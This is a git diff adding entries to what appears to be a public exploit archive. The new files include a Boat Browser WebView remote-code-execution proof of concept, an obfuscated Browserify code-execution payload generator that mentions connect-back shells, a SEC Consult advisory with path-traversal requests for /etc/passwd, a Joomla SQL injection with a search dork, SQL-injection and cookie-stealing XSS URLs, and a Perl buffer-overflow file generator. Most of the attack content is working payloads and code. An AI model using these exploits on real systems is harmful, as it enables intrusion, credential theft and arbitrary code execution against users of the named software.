diff --git a/files.csv b/files.csv
index 384f0c248..25d7c5851 100755
--- a/files.csv
+++ b/files.csv
@@ -30694,3 +30694,13 @@ id,file,description,date,author,platform,type,port
 34083,platforms/php/webapps/34083.txt,"Western Digital My Book World Edition 1.1.16 'lang' Parameter Cross-Site Scripting Vulnerabilities",2009-12-30,emgent,php,webapps,0
 34084,platforms/php/webapps/34084.txt,"L2Web LineWeb 1.0.5 Multiple Input Validation Vulnerabilities",2010-01-06,"Ignacio Garrido",php,webapps,0
 34085,platforms/php/webapps/34085.txt,"Gigya Socialize Plugin 1.0/1.1.x for Wordpress Cross Site Scripting Vulnerability",2010-06-04,MustLive,php,webapps,0
+34086,platforms/linux/webapps/34086.txt,"Bitdefender GravityZone 5.1.5.386 - Multiple Vulnerabilities",2014-07-16,"SEC Consult",linux,webapps,443
+34087,platforms/php/webapps/34087.txt,"Joomla Youtube Gallery Component - SQL Injection Vulnerability",2014-07-16,"Pham Van Khanh",php,webapps,80
+34088,platforms/android/remote/34088.html,"Boat Browser 8.0 and 8.0.1 - Remote Code Execution Vulnerability",2014-07-16,c0otlass,android,remote,0
+34090,platforms/multiple/dos/34090.py,"Node Browserify 4.2.0 - Remote Code Execution Vulnerability",2014-07-16,"Cal Leeming",multiple,dos,0
+34091,platforms/php/webapps/34091.txt,"Pay Per Minute Video Chat Script 2.x SQL Injection and Multiple Cross Site Scripting Vulnerabilities",2010-01-04,R3d-D3V!L,php,webapps,0
+34092,platforms/jsp/webapps/34092.txt,"JForum 2.1.8 'bookmarks' Module Multiple HTML Injection Vulnerabilities",2010-06-06,"Adam Baldwin",jsp,webapps,0
+34094,platforms/windows/dos/34094.pl,"Aqua Real Screensaver '.ar' File Buffer Overflow Vulnerability",2010-01-15,R3d-D3V!L,windows,dos,0
+34095,platforms/php/webapps/34095.txt,"PonVFTP 'login.php' SQL Injection Vulnerability",2010-01-15,S2K9,php,webapps,0
+34096,platforms/php/webapps/34096.txt,"CuteSITE CMS 1.x manage/add_user.php user_id Parameter SQL Injection",2010-06-06,"High-Tech Bridge SA",php,webapps,0
+34097,platforms/php/webapps/34097.txt,"CuteSITE CMS 1.x manage/main.php fld_path Parameter XSS",2010-06-06,"High-Tech Bridge SA",php,webapps,0
diff --git a/platforms/android/remote/34088.html b/platforms/android/remote/34088.html
new file mode 100755
index 000000000..571ad1e11
--- /dev/null
+++ b/platforms/android/remote/34088.html
@@ -0,0 +1,72 @@
+<!--
+													.:: Remote code execution vulnerability in Boat Browser ::.
+
+													
+credit: c0otlass
+social contact: https://twitter.com/c0otlass
+mail: c0otlass@gmail.com
+CVE reserved : 2014-4968
+time of discovery:  July 14, 2014
+Browser Official site:http://www.boatmob.com/
+Browser download link:https://play.google.com/store/apps/details?id=com.boatbrowser.free&hl=en
+version Affected : In  8.0 and 8.0.1 tested , Android 3.0 through 4.1.x 
+Risk rate: High
+vulnerability Description impact: 
+	The WebView class and  use of the WebView.addJavascriptInterface method has vulnerability which cause remote code in html page run in android device
+	a related issue to CVE-2012-6636
+proof of concept:
+//..............................................poc.hmtl............................................
+-->
+<!DOCTYPE html>
+<html>
+<head>
+<meta charset="UFT-8">
+<title>CreatMalTxt POC - WebView</title>
+<script>
+var obj;
+function TestVulnerability()
+		{
+temp="not";
+var myObject = window;
+	for (var name in myObject) {										
+		if (myObject.hasOwnProperty(name)) {									
+			try
+			{				
+			temp=myObject[name].getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null);												 
+			}
+			catch(e)
+			{														
+			}
+			}
+	}
+				if(temp=="not")
+						{
+							document.getElementById("log").innerHTML="this browser has been patched";												
+						}
+					else{
+						 document.getElementById("log").innerHTML = "This browser is exploitabale" + "<br>" + " the poc file hase been created in sdcard ...<br>" ;
+						 document.getElementById("log").innerHTML +=  "we could see proccess information"+ temp.exec(['/system/bin/sh','-c','echo \"mwr\" > /mnt/sdcard/mwr.txt']);																					
+						}
+		}		
+</script>
+</head>
+<body >
+<h3>CreatMalTxt POC</h3>
+<input value="Test Vulnerability"  type="button"  onclick="TestVulnerability();" />
+<div id="log"></div>
+</body>		
+</html>
+
+<!--
+Solution:
+https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-addjavascriptinterface-remote-code-execution/
+http://www.programering.com/a/MDM3YzMwATc.html
+https://www.securecoding.cert.org/confluence/pages/viewpage.action?pageId=129859614		
+
+References: 
+http://blog.trustlook.com/2013/09/04/alert-android-webview-addjavascriptinterface-code-execution-vulnerability/
+https://labs.mwrinfosecurity.com/blog/2012/04/23/adventures-with-android-webviews/
+http://50.56.33.56/blog/?p=314
+https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-addjavascriptinterface-remote-code-execution/
+https://github.com/mwrlabs/drozer/blob/bcadf5c3fd08c4becf84ed34302a41d7b5e9db63/src/drozer/modules/exploit/mitm/addJavaScriptInterface.py
+-->
\ No newline at end of file
diff --git a/platforms/jsp/webapps/34092.txt b/platforms/jsp/webapps/34092.txt
new file mode 100755
index 000000000..7f5eb0c66
--- /dev/null
+++ b/platforms/jsp/webapps/34092.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/40600/info
+
+JForum is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+JForum 2.1.8 is vulnerable; other versions may also be affected. 
+
+https://www.example.com/forum/bookmarks/insert/2/1.page?action=insertSave&description=<XSS>&module=bookmarks&relation_id=1&relation_type=2&title=<XSS>&visible=1
\ No newline at end of file
diff --git a/platforms/linux/webapps/34086.txt b/platforms/linux/webapps/34086.txt
new file mode 100755
index 000000000..ac1741649
--- /dev/null
+++ b/platforms/linux/webapps/34086.txt
@@ -0,0 +1,166 @@
+SEC Consult Vulnerability Lab Security Advisory < 20140716-3 >
+=======================================================================
+              title: Multiple critical vulnerabilities
+            product: Bitdefender GravityZone
+ vulnerable version: <5.1.11.432
+      fixed version: >=5.1.11.432
+             impact: critical
+           homepage: http://www.bitdefender.com
+              found: 2014-05-22
+                 by: Stefan Viehböck
+                     SEC Consult Vulnerability Lab 
+                     https://www.sec-consult.com
+=======================================================================
+
+Vendor description:
+-------------------
+Bitdefender GravityZone lets enterprises control and protect the heterogeneous
+environments of today. The solution combines highly optimized virtualization
+aware security with leading detection technologies and a fresh, but proven,
+architecture. It empowers administrators with features adapted to reduce the
+daily security hassle and eliminate the need for point solutions with unified
+protection across virtualized, physical, and mobile endpoints. Unlike other
+solutions that bolt-on modules to an aging architecture, the GravityZone
+Control Center dashboard has been designed specifically to unify monitoring
+and security management in a single simple and accessible interface.
+
+Source: http://download.bitdefender.com/resources/media/materials/business/en/datasheet-gravityzone-brief.pdf
+
+
+Business recommendation:
+------------------------
+Attackers are able to completely compromise the Bitdefender GravityZone
+solution as they can gain system and database level access.
+Furthermore attackers can manage all endpoints.
+
+The Bitdefender GravityZone can be used as an entry point into the target
+infrastructure (lateral movement, privilege escalation).
+
+It is highly recommended by SEC Consult not to use this software until a
+thorough security review has been performed by security professionals and all
+identified issues have been resolved.
+
+
+Vulnerability overview/description:
+-----------------------------------
+1) Unauthenticated local file disclosure (Web Console, Update Server)
+Unauthenticated users can read arbitrary files from the filesystem with the
+privileges of the "nginx" operating system user. These files include
+configuration files containing sensitive information such as clear text
+passwords which can be used in further attacks.
+
+Separate vulnerabilities affecting both Web Console and Update Server were
+found.
+
+
+2) Insecure service configuration / design issues
+The MongoDB database which is offered via the network by default (TCP ports
+27017, 28017) can be accessed using hardcoded credentials which can't be
+changed. The overall system design requires the database to be accessible via
+the network.
+All relevant GravityZone configuration data can be accessed and changed. This
+includes the user table.
+
+Excerpt from the documentation describing the TCP port 27017:
+"Default port used by the Communication Server and Control Center to access
+the Database."
+
+
+3) Missing authentication
+Authentication is not required for certain scripts in the web UI. This
+allows unauthenticated attackers to execute administrative functions without
+prior authentication.
+
+
+Proof of concept:
+-----------------
+1) Unauthenticated local file disclosure (Web Console, Update Server)
+Arbitrary files can be downloaded via a vulnerable script:
+https://<host>/webservice/CORE/downloadFullKitEpc/a/1?id=../../../../../etc/passwd
+
+The Update Server is vulnerable to local file disclosure as well. Arbitrary
+files can be downloaded using the following HTTP request:
+
+GET /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
+Host: <host>:7074
+
+2) Insecure service configuration / Design issues
+Attackers can connect to MongoDB on TCP ports 27017 and 28017 using the
+following hardcoded credentials:
+Username: <removed>
+Password: <removed>
+
+Detailed proof of concept exploits have been removed for this vulnerability.
+
+3) Missing authentication
+Authentication is not required for the following script:
+/webservice/CORE/downloadSignedCsr (Unauthenticated certificate upload)
+
+
+
+Vulnerable / tested versions:
+-----------------------------
+The vulnerabilities have been verified to exist in GravityZone 5.1.5.386,
+which was the most recent version at the time of discovery.
+ 
+
+
+Vendor contact timeline:
+------------------------
+2014-05-26: Sending responsible disclosure policy and requesting encryption
+            keys.
+2014-05-26: Vendor responds providing encryption keys.
+2014-05-26: Sending advisory and proof of concept exploit via encrypted
+            channel.
+2014-05-26: Vendor confirms receipt.
+2014-06-04: Requesting status update.
+2014-06-14: Vendor provides status update. Update will be released "End of
+            June".
+2014-06-26: Vendor provides status update. Update for issue #1 and #3 will
+            be released June 30. Update for issue #2 will be released at the
+			end of July.
+2014-06-27: Requesting info about other affected products. Clarifying
+            disclosure of issue #2.
+2014-07-09: Vendor confirms that update for issue #1 and #3 has been shipped
+            and KB article for issue #2 will be released.
+2014-07-15: Requesting version numbers of affected products.
+2014-07-16: SEC Consult releases coordinated security advisory.
+
+
+
+Solution:
+---------
+Update to a more recent version of Bitdefender GravityZone _and_
+implement mitigations for the issue #2.
+
+More information can be found at:
+http://www.bitdefender.com/support/how-to-configure-iptables-firewall-rules-on-gravityzone-for-restricting-outside-access-to-mongodatabase-1265.html
+
+
+Workaround:
+-----------
+No workaround available.
+
+
+Advisory URL:
+-------------
+https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
+
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+SEC Consult Vulnerability Lab
+
+SEC Consult
+Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius
+
+Headquarter:
+Mooslackengasse 17, 1190 Vienna, Austria
+Phone:   +43 1 8903043 0
+Fax:     +43 1 8903043 15
+
+Mail: research at sec-consult dot com
+Web: https://www.sec-consult.com
+Blog: http://blog.sec-consult.com
+Twitter: https://twitter.com/sec_consult
+
+EOF Stefan Viehböck / @2014
\ No newline at end of file
diff --git a/platforms/multiple/dos/34090.py b/platforms/multiple/dos/34090.py
new file mode 100755
index 000000000..b4e15e5f7
--- /dev/null
+++ b/platforms/multiple/dos/34090.py
@@ -0,0 +1,43 @@
+#!/usr/bin/python
+ 
+"""
+Browserify POC exploit
+
+http://iops.io/blog/browserify-rce-vulnerability/
+ 
+To run, just do:
+ 
+$ python poc.py > exploit.js
+$ browserify exploit.js
+BITCH I TOLD YOU THIS SHIT IS FABULOUS
+[[garbage output]]
+},{}]},{},[1]) 00:08:32 up 12:29,  3 users,  load average: 0.00, 0.02, 0.05
+uid=1001(foxx) gid=1001(foxx) groups=1001(foxx),27(sudo),105(fuse)
+ 
+You can also spawn() and create a connect back shell.
+ 
+Enjoy
+ 
+"""
+ 
+def charencode(string):
+    encoded=''
+    for char in string:
+        encoded=encoded+","+str(ord(char))
+    return encoded[1:]
+ 
+plaintext = """
+   var require = this.process.mainModule.require;
+   var sys = require('sys')
+   var exec = require('child_process').exec;
+   function puts(error, stdout, stderr) { sys.puts(stdout) }
+   exec("uptime && id", puts);
+   console.log("BITCH I TOLD YOU THIS SHIT IS FABULOUS");
+"""
+ 
+payload = charencode(plaintext)
+final = "eval(String.fromCharCode(%s));" %(payload)
+ 
+print "});"
+print final
+print "(function(){"
\ No newline at end of file
diff --git a/platforms/php/webapps/34087.txt b/platforms/php/webapps/34087.txt
new file mode 100755
index 000000000..9ca14e854
--- /dev/null
+++ b/platforms/php/webapps/34087.txt
@@ -0,0 +1,51 @@
+# Exploit Title: Joomla component com_youtubegallery - SQL Injection
+vulnerability
+# Google Dork: inurl:index.php?option=com_youtubegallery
+# Date: 15-07-2014
+# Exploit Author: Pham Van Khanh (phamvankhanhbka@gmail.com)
+# Vendor Homepage: http://www.joomlaboat.com/youtube-gallery
+# Software Link: http://www.joomlaboat.com/youtube-gallery
+# Version: 4.x ( 3.x maybe)
+# Tested on: newest version 4.1.7 on Joomla 1.5, 2.5, 3
+# CVE : CVE-2014-4960
+
+Detail:
+In line: 40, file: components\com_youtubegallery\models\gallery.php,
+if parameter listid is int (or can cast to int), $listid and $themeid
+will not santinized.
+Source code:
+40: if(JRequest::getInt('listid'))
+41: {
+42:        //Shadow Box
+43:        $listid=JRequest::getVar('listid');
+44:
+45:
+46:        //Get Theme
+47:         $m_themeid=(int)JRequest::getVar('mobilethemeid');
+48:         if($m_themeid!=0)
+49:         {
+50:              if(YouTubeGalleryMisc::check_user_agent('mobile'))
+51:                    $themeid=$m_themeid;
+52:              else
+53:                    $themeid=JRequest::getVar('themeid');
+54:              }
+55:          else
+56:               $themeid=JRequest::getVar('themeid');
+57: }
+After, $themeid and $listid are used in line 86, 92. Two method
+getVideoListTableRow and getThemeTableRow concat string to construct
+sql query. So it is vulnerable to SQL Injection.
+Source code:
+86: if(!$this->misc->getVideoListTableRow($listid))
+87: {
+88:         echo '<p>No video found</p>';
+89:         return false;
+90: }
+91:
+92: if(!$this->misc->getThemeTableRow($themeid))
+93: {
+94:          echo '<p>No video found</p>';
+95:          return false;
+96: }
+
+# Site POF: http://server/index.php?option=com_youtubegallery&view=youtubegallery&listid=1&themeid=1'&videoid=ETMVUuFbToQ&tmpl=component&TB_iframe=true&height=500&width=700
diff --git a/platforms/php/webapps/34091.txt b/platforms/php/webapps/34091.txt
new file mode 100755
index 000000000..f0bc52f9b
--- /dev/null
+++ b/platforms/php/webapps/34091.txt
@@ -0,0 +1,16 @@
+source: http://www.securityfocus.com/bid/40585/info
+
+Pay Per Minute Video Chat Script is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Cross-site scripting:
+
+http://www.example.com/P47H/admin/memberviewdetails.php?id=%3E%22%3E%3CScRiPt%20%0a%0d%3Ealert(666)%3B%3C/ScRiPt%3E
+ 
+http://www.example.com/P47H/videos.php?model=%3E%22%3E%3CScRiPt%20%0a%0d%3Ealert(666)%3B%3C/ScRiPt%3E
+
+
+SQL-injection:
+
+http://www.example.com/P47H/index_ie.php?page=-666
diff --git a/platforms/php/webapps/34095.txt b/platforms/php/webapps/34095.txt
new file mode 100755
index 000000000..4dbf7ba49
--- /dev/null
+++ b/platforms/php/webapps/34095.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/40608/info
+
+PonVFTP is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+The following example data is available:
+
+password: 'or' 1=1 
\ No newline at end of file
diff --git a/platforms/php/webapps/34096.txt b/platforms/php/webapps/34096.txt
new file mode 100755
index 000000000..cabcded2a
--- /dev/null
+++ b/platforms/php/webapps/34096.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/40612/info
+
+CuteSITE CMS is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+CuteSITE CMS 1.5.0 is vulnerable; prior versions may also be affected.
+
+http://www.example.com/manage/add_user.php?user_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,user%28%29,15,16
\ No newline at end of file
diff --git a/platforms/php/webapps/34097.txt b/platforms/php/webapps/34097.txt
new file mode 100755
index 000000000..5e24c62ef
--- /dev/null
+++ b/platforms/php/webapps/34097.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/40612/info
+ 
+CuteSITE CMS is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
+ 
+Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+ 
+CuteSITE CMS 1.5.0 is vulnerable; prior versions may also be affected.
+
+http://www.example.com/manage/main.php?fld_path=XXX%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
\ No newline at end of file
diff --git a/platforms/windows/dos/34094.pl b/platforms/windows/dos/34094.pl
new file mode 100755
index 000000000..29292fb5f
--- /dev/null
+++ b/platforms/windows/dos/34094.pl
@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/40606/info
+
+Aqua Real Screensaver is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input.
+
+Successfully exploiting this issue may allow remote attackers to execute arbitrary code in the context of the vulnerable application. Failed attacks will cause denial-of-service conditions.
+
+Aqua Real 1 and 2 are vulnerable; other versions may also be affected. 
+
+#!c/perl/bin/
+my $file= "Crash.ar";
+my $boom="\x41" x 5000;
+open(myfile,'>>Crash.ar') || die "Cannot Creat file\n\n";
+print myfile $boom;
+print "Done..!~#\n";
\ No newline at end of file